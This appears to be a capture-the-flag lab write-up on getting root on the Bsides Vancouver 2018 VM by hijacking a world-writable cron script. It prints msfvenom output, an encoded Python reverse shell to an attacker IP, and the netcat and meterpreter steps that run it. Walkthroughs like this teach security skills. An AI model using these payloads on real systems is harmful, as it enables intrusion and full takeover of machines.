HackOnTuesday Episode 10 Featured Image

#HackOnTuesday Episode 10 How to hack the Bsides Vancouver 2018 CTF VM (Part 2)

Hello and welcome to another episode of the #HackOnTuesday show. Today, we will explore an alternative way to get root on the Bsides Vancouver 2018 CTF VM. If you haven’t seen it already, I encourage you to go watch the “How to hack the Bsides Vancouver 2018 CTF VM (Part 1)“, before you watch this video.

In the previous video, we found a hidden WordPress installation and were able to take advantage of a weak password to log into the dashboard. From there, when then modified one of the many files of the theme and included a php/meterpreter/reverse_tcp payload.

So, here we are with a meterpreter shell and access to the target VM as the www-data user. What’s next? How do we get root? Well, we have to go through the system and look for either a security vulnerability or a misconfiguration that we can use to elevate our permissions.

A great tool to do that is LinEnum. For this demo, I’ve already cloned the repository in the root directory of my Kali machine as you can see if I type:

meterpreter > lls -S "LinEnum"
Listing Local: /root
====================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2019-09-24 06:05:19 -0700  LinEnum

NOTE: To get LinEnum, type: git clone https://github.com/rebootuser/LinEnum.git.

The next step is to upload the LinEnum script to the target VM.

meterpreter > pwd
/var/www/backup_wordpress/wp-content/themes/twentysixteen
meterpreter > cd /tmp
meterpreter > pwd
/tmp
meterpreter > upload /root/LinEnum/LinEnum.sh
[*] uploading  : /root/LinEnum/LinEnum.sh -> LinEnum.sh
[*] Uploaded -1.00 B of 44.59 KiB (-0.0%): /root/LinEnum/LinEnum.sh -> LinEnum.sh
[*] uploaded   : /root/LinEnum/LinEnum.sh -> LinEnum.sh

Excellent! We now have LinEnum on the target VM and just need to run it in order to get a good picture of the victim’s system. To run the script, we can type:

meterpreter > shell
Process 1975 created.
Channel 2 created.
bash ./LinEnum.sh > report.log         
exit

When the script is done, we should see a report.log file in the /tmp directory.

meterpreter > ls
Listing: /tmp
=============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
41777/rwxrwxrwx   4096   dir   2019-02-19 15:08:22 -0800  .ICE-unix
41777/rwxrwxrwx   4096   dir   2019-02-19 15:08:22 -0800  .X11-unix
100644/rw-r--r--  45656  fil   2019-02-19 17:26:29 -0800  LinEnum.sh
40700/rwx------   4096   dir   2019-02-19 15:08:22 -0800  pulse-PKdhtXMmr18n
100644/rw-r--r--  44774  fil   2019-02-19 17:28:19 -0800  report.log

So, let’s download this report.

meterpreter > download report.log
[*] Downloading: report.log -> report.log
[*] Downloaded 43.72 KiB of 43.72 KiB (100.0%): report.log -> report.log
[*] download   : report.log -> report.log

And take a look at its content.

root@kali:~# cat report.log 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.971

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue Feb 19 17:28:00 PST 2019


### SYSTEM ##############################################
[-] Kernel information:
Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux

[...TRIMMED…]

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /usr/local/bin/cleanup
#

[...TRIMMED…]

If we go through the whole report, we will see many interesting things that are probably there just to make the VM more fun but that you will hopefully not encounter in a real world environment, like for example the fact that root is allowed to login via SSH.

Nonetheless, there is one section that is particularly interesting, the crontab section. According to the output, there is a script that runs every minute: the /usr/local/bin/cleanup script. So, let’s take a look at the permissions of this file.

meterpreter > ls /usr/local/bin/cleanup
100777/rwxrwxrwx  64  fil  2018-03-03 16:13:53 -0800  /usr/local/bin/cleanup

Well, surprise surprise.. The /usr/local/bin/cleanup script is world writable and runs every minute. This means that we can add a command to this script and it will be executed as root.

For example, we can add a command to show the content of the /etc/shadow file or initiate a reverse shell to our machine. I prefer the second one, so let’s use msfvenom to create a Python reverse shell.

root@kali:~# msfvenom -p cmd/unix/reverse_python lhost=192.168.10.6 lport=4444
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 521 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICwgICAgICAgIHN1YnByb2Nlc3MgICAsICAgICAgICBvczsgICAgICAgaG9zdD0iMTkyLjE2OC4xMC42IjsgICAgICAgcG9ydD00NDQ0OyAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pOyAgICAgICBzLmNvbm5lY3QoKGhvc3QgICAsICAgICAgICBwb3J0KSk7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgICAgICAgIDApOyAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgICAxKTsgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgICAgICAgMik7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

Great! Now, we can add the Python command to our cleanup script.

meterpreter > download /usr/local/bin/cleanup
[*] Downloading: /usr/local/bin/cleanup -> cleanup
[*] Downloaded 64.00 B of 64.00 B (100.0%): /usr/local/bin/cleanup -> cleanup
[*] download   : /usr/local/bin/cleanup -> cleanup

---

root@kali:~# vim cleanup        # Add Python command
root@kali:~# cat cleanup 
#!/bin/sh

rm -rf /var/log/apache2/*	# Clean those damn logs!!

python -c "exec('aW1wb3J0IHNvY2tldCAgICwgICAgICAgIHN1YnByb2Nlc3MgICAsICAgICAgICBvczsgICAgICAgaG9zdD0iMTkyLjE2OC4xMC42IjsgICAgICAgcG9ydD00NDQ0OyAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pOyAgICAgICBzLmNvbm5lY3QoKGhvc3QgICAsICAgICAgICBwb3J0KSk7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgICAgICAgIDApOyAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgICAxKTsgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgICAgICAgMik7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

Finally, before we upload our version of the cleanup script, we have to make sure we have a listener waiting for the reverse shell. So, let’s run Netcat in listening mode.

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...

With netcat listening for any incoming connections, we are ready to upload our version of the cleanup script.

meterpreter > upload cleanup /usr/local/bin/cleanup
[*] uploading  : cleanup -> /usr/local/bin/cleanup
[*] Uploaded -1.00 B of 586.00 B (-0.17%): cleanup -> /usr/local/bin/cleanup
[*] uploaded   : cleanup -> /usr/local/bin/cleanup

Then, we just need to wait and if everything goes well, we will get a reverse shell within a minute.

192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.6] from (UNKNOWN) [192.168.10.5] 57328
whoami
root
uname -a
Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux

Boom! That’s it! This is how you elevate your permissions in the Bsides Vancouver 2018 CTF VM using a vulnerable cron job.

If you enjoyed this article and have an idea for another, please feel free to let me know via LinkedIn (https://www.linkedin.com/in/giannignesa/) or via Twitter (@ptracesecurity / @GianniGnesa).